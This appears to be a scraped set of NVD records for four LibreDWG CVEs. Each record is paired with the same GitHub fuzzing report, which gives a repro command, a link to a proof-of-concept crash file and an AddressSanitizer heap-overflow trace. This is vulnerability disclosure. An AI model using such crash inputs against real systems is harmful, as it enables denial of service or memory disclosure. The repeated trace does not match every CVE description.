Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: ./dwg2svg2 $PoC **1.heap-buffer-overflow in read_pages_map ../../src/decode_r2007.c:1007** POC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG_0.9.3.2564/id:000239%2Csig:06%2Csrc:007083%2Cop:havoc%2Crep:4 ASAN says: ``` ==4335==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x611000000258 at pc 0x55f9e1e04e05 bp 0x7ffc92f94a40 sp 0x7ffc92f94a30 READ of size 8 at 0x611000000258 thread T0 #0 0x55f9e1e04e04 in read_pages_map ../../src/decode_r2007.c:1007 #1 0x55f9e1e04e04 in read_r2007_meta_data ../../src/decode_r2007.c:1774 #2 0x55f9e1dd66d7 in decode_R2007 ../../src/decode.c:2973 #3 0x55f9e1dd66d7 in dwg_decode ../../src/decode.c:241 #4 0x55f9e177b466 in dwg_read_file ../../src/dwg.c:210 #5 0x55f9e1776d4b in test_SVG ../../examples/dwg2svg2.c:116 #6 0x55f9e1776d4b in main ../../examples/dwg2svg2.c:501 #7 0x7f595f806b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #8 0x55f9e17779a9 in _start (/home/user/linhlhq/libredwg/asan_build/examples/dwg2svg2+0x2d59a9) 0x61100000025c is located 0 bytes to the right of 220-byte region [0x611000000180,0x61100000025c) allocated by thread T0 here: #0 0x7f5960052d38 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded38) #1 0x55f9e1de73be in read_system_page ../../src/decode_r2007.c:635 SUMMARY: AddressSanitizer: heap-buffer-overflow ../../src/decode_r2007.c:1007 in read_pages_map Shadow bytes around the buggy address: 0x0c227fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c227fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c227fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c227fff8020: 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa fa 0x0c227fff8030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c227fff8040: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa 0x0c227fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==4335==ABORTING ```
Several bugs found by fuzzing
https://api.github.com/repos/LibreDWG/libredwg/issues/179/comments
7
2020-01-03T03:19:25Z
2020-01-16T12:12:04Z
https://github.com/LibreDWG/libredwg/issues/179
544,834,443
179
985
CVE-2020-6611
2020-01-08T21:15:11.367
GNU LibreDWG 0.9.3.2564 has a NULL pointer dereference in get_next_owned_entity in dwg.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00046.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00052.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/179#issuecomment-570447190" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00046.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00052.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/179#issuecomment-570447190" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.9.3.2564:*:*:*:*:*:*:*", "matchCriteriaId": "6292F71C-4D80-4570-A07D-C790FEEE9B2B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opensuse:backports_sle:15.0:sp1:*:*:*:*:*:*", "matchCriteriaId": "40513095-7E6E-46B3-B604-C926F1BA3568", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/LibreDWG/libredwg/issues/179#issuecomment-570447190
[ "Exploit", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: ./dwg2svg2 $PoC **1.heap-buffer-overflow in read_pages_map ../../src/decode_r2007.c:1007** POC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG_0.9.3.2564/id:000239%2Csig:06%2Csrc:007083%2Cop:havoc%2Crep:4 ASAN says: ``` ==4335==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x611000000258 at pc 0x55f9e1e04e05 bp 0x7ffc92f94a40 sp 0x7ffc92f94a30 READ of size 8 at 0x611000000258 thread T0 #0 0x55f9e1e04e04 in read_pages_map ../../src/decode_r2007.c:1007 #1 0x55f9e1e04e04 in read_r2007_meta_data ../../src/decode_r2007.c:1774 #2 0x55f9e1dd66d7 in decode_R2007 ../../src/decode.c:2973 #3 0x55f9e1dd66d7 in dwg_decode ../../src/decode.c:241 #4 0x55f9e177b466 in dwg_read_file ../../src/dwg.c:210 #5 0x55f9e1776d4b in test_SVG ../../examples/dwg2svg2.c:116 #6 0x55f9e1776d4b in main ../../examples/dwg2svg2.c:501 #7 0x7f595f806b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #8 0x55f9e17779a9 in _start (/home/user/linhlhq/libredwg/asan_build/examples/dwg2svg2+0x2d59a9) 0x61100000025c is located 0 bytes to the right of 220-byte region [0x611000000180,0x61100000025c) allocated by thread T0 here: #0 0x7f5960052d38 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded38) #1 0x55f9e1de73be in read_system_page ../../src/decode_r2007.c:635 SUMMARY: AddressSanitizer: heap-buffer-overflow ../../src/decode_r2007.c:1007 in read_pages_map Shadow bytes around the buggy address: 0x0c227fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c227fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c227fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c227fff8020: 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa fa 0x0c227fff8030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c227fff8040: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa 0x0c227fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==4335==ABORTING ```
Several bugs found by fuzzing
https://api.github.com/repos/LibreDWG/libredwg/issues/179/comments
7
2020-01-03T03:19:25Z
2020-01-16T12:12:04Z
https://github.com/LibreDWG/libredwg/issues/179
544,834,443
179
986
CVE-2020-6612
2020-01-08T21:15:11.457
GNU LibreDWG 0.9.3.2564 has a heap-based buffer over-read in copy_compressed_bytes in decode_r2007.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00046.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00052.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/179#issuecomment-570447169" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00046.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00052.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/179#issuecomment-570447169" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.9.3.2564:*:*:*:*:*:*:*", "matchCriteriaId": "6292F71C-4D80-4570-A07D-C790FEEE9B2B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opensuse:backports_sle:15.0:sp1:*:*:*:*:*:*", "matchCriteriaId": "40513095-7E6E-46B3-B604-C926F1BA3568", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/LibreDWG/libredwg/issues/179#issuecomment-570447169
[ "Exploit", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: ./dwg2svg2 $PoC **1.heap-buffer-overflow in read_pages_map ../../src/decode_r2007.c:1007** POC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG_0.9.3.2564/id:000239%2Csig:06%2Csrc:007083%2Cop:havoc%2Crep:4 ASAN says: ``` ==4335==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x611000000258 at pc 0x55f9e1e04e05 bp 0x7ffc92f94a40 sp 0x7ffc92f94a30 READ of size 8 at 0x611000000258 thread T0 #0 0x55f9e1e04e04 in read_pages_map ../../src/decode_r2007.c:1007 #1 0x55f9e1e04e04 in read_r2007_meta_data ../../src/decode_r2007.c:1774 #2 0x55f9e1dd66d7 in decode_R2007 ../../src/decode.c:2973 #3 0x55f9e1dd66d7 in dwg_decode ../../src/decode.c:241 #4 0x55f9e177b466 in dwg_read_file ../../src/dwg.c:210 #5 0x55f9e1776d4b in test_SVG ../../examples/dwg2svg2.c:116 #6 0x55f9e1776d4b in main ../../examples/dwg2svg2.c:501 #7 0x7f595f806b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #8 0x55f9e17779a9 in _start (/home/user/linhlhq/libredwg/asan_build/examples/dwg2svg2+0x2d59a9) 0x61100000025c is located 0 bytes to the right of 220-byte region [0x611000000180,0x61100000025c) allocated by thread T0 here: #0 0x7f5960052d38 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded38) #1 0x55f9e1de73be in read_system_page ../../src/decode_r2007.c:635 SUMMARY: AddressSanitizer: heap-buffer-overflow ../../src/decode_r2007.c:1007 in read_pages_map Shadow bytes around the buggy address: 0x0c227fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c227fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c227fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c227fff8020: 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa fa 0x0c227fff8030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c227fff8040: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa 0x0c227fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==4335==ABORTING ```
Several bugs found by fuzzing
https://api.github.com/repos/LibreDWG/libredwg/issues/179/comments
7
2020-01-03T03:19:25Z
2020-01-16T12:12:04Z
https://github.com/LibreDWG/libredwg/issues/179
544,834,443
179
987
CVE-2020-6613
2020-01-08T21:15:11.537
GNU LibreDWG 0.9.3.2564 has a heap-based buffer over-read in bit_search_sentinel in bits.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00046.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00052.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/179#issuecomment-570447025" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00046.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00052.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/179#issuecomment-570447025" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.9.3.2564:*:*:*:*:*:*:*", "matchCriteriaId": "6292F71C-4D80-4570-A07D-C790FEEE9B2B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opensuse:backports_sle:15.0:sp1:*:*:*:*:*:*", "matchCriteriaId": "40513095-7E6E-46B3-B604-C926F1BA3568", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/LibreDWG/libredwg/issues/179#issuecomment-570447025
[ "Exploit", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: ./dwg2svg2 $PoC **1.heap-buffer-overflow in read_pages_map ../../src/decode_r2007.c:1007** POC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG_0.9.3.2564/id:000239%2Csig:06%2Csrc:007083%2Cop:havoc%2Crep:4 ASAN says: ``` ==4335==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x611000000258 at pc 0x55f9e1e04e05 bp 0x7ffc92f94a40 sp 0x7ffc92f94a30 READ of size 8 at 0x611000000258 thread T0 #0 0x55f9e1e04e04 in read_pages_map ../../src/decode_r2007.c:1007 #1 0x55f9e1e04e04 in read_r2007_meta_data ../../src/decode_r2007.c:1774 #2 0x55f9e1dd66d7 in decode_R2007 ../../src/decode.c:2973 #3 0x55f9e1dd66d7 in dwg_decode ../../src/decode.c:241 #4 0x55f9e177b466 in dwg_read_file ../../src/dwg.c:210 #5 0x55f9e1776d4b in test_SVG ../../examples/dwg2svg2.c:116 #6 0x55f9e1776d4b in main ../../examples/dwg2svg2.c:501 #7 0x7f595f806b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #8 0x55f9e17779a9 in _start (/home/user/linhlhq/libredwg/asan_build/examples/dwg2svg2+0x2d59a9) 0x61100000025c is located 0 bytes to the right of 220-byte region [0x611000000180,0x61100000025c) allocated by thread T0 here: #0 0x7f5960052d38 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded38) #1 0x55f9e1de73be in read_system_page ../../src/decode_r2007.c:635 SUMMARY: AddressSanitizer: heap-buffer-overflow ../../src/decode_r2007.c:1007 in read_pages_map Shadow bytes around the buggy address: 0x0c227fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c227fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c227fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c227fff8020: 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa fa 0x0c227fff8030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c227fff8040: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa 0x0c227fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==4335==ABORTING ```
Several bugs found by fuzzing
https://api.github.com/repos/LibreDWG/libredwg/issues/179/comments
7
2020-01-03T03:19:25Z
2020-01-16T12:12:04Z
https://github.com/LibreDWG/libredwg/issues/179
544,834,443
179
988
CVE-2020-6614
2020-01-08T21:15:11.630
GNU LibreDWG 0.9.3.2564 has a heap-based buffer over-read in bfr_read in decode.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00046.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00052.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/179#issuecomment-570447068" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00046.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00052.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/179#issuecomment-570447068" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.9.3.2564:*:*:*:*:*:*:*", "matchCriteriaId": "6292F71C-4D80-4570-A07D-C790FEEE9B2B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opensuse:backports_sle:15.0:sp1:*:*:*:*:*:*", "matchCriteriaId": "40513095-7E6E-46B3-B604-C926F1BA3568", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/LibreDWG/libredwg/issues/179#issuecomment-570447068
[ "Exploit", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: ./dwg2svg2 $PoC **1.heap-buffer-overflow in read_pages_map ../../src/decode_r2007.c:1007** POC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG_0.9.3.2564/id:000239%2Csig:06%2Csrc:007083%2Cop:havoc%2Crep:4 ASAN says: ``` ==4335==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x611000000258 at pc 0x55f9e1e04e05 bp 0x7ffc92f94a40 sp 0x7ffc92f94a30 READ of size 8 at 0x611000000258 thread T0 #0 0x55f9e1e04e04 in read_pages_map ../../src/decode_r2007.c:1007 #1 0x55f9e1e04e04 in read_r2007_meta_data ../../src/decode_r2007.c:1774 #2 0x55f9e1dd66d7 in decode_R2007 ../../src/decode.c:2973 #3 0x55f9e1dd66d7 in dwg_decode ../../src/decode.c:241 #4 0x55f9e177b466 in dwg_read_file ../../src/dwg.c:210 #5 0x55f9e1776d4b in test_SVG ../../examples/dwg2svg2.c:116 #6 0x55f9e1776d4b in main ../../examples/dwg2svg2.c:501 #7 0x7f595f806b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #8 0x55f9e17779a9 in _start (/home/user/linhlhq/libredwg/asan_build/examples/dwg2svg2+0x2d59a9) 0x61100000025c is located 0 bytes to the right of 220-byte region [0x611000000180,0x61100000025c) allocated by thread T0 here: #0 0x7f5960052d38 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded38) #1 0x55f9e1de73be in read_system_page ../../src/decode_r2007.c:635 SUMMARY: AddressSanitizer: heap-buffer-overflow ../../src/decode_r2007.c:1007 in read_pages_map Shadow bytes around the buggy address: 0x0c227fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c227fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c227fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c227fff8020: 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa fa 0x0c227fff8030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c227fff8040: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa 0x0c227fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8060: fa fa fa fa fa fa fa fa fa fa fa 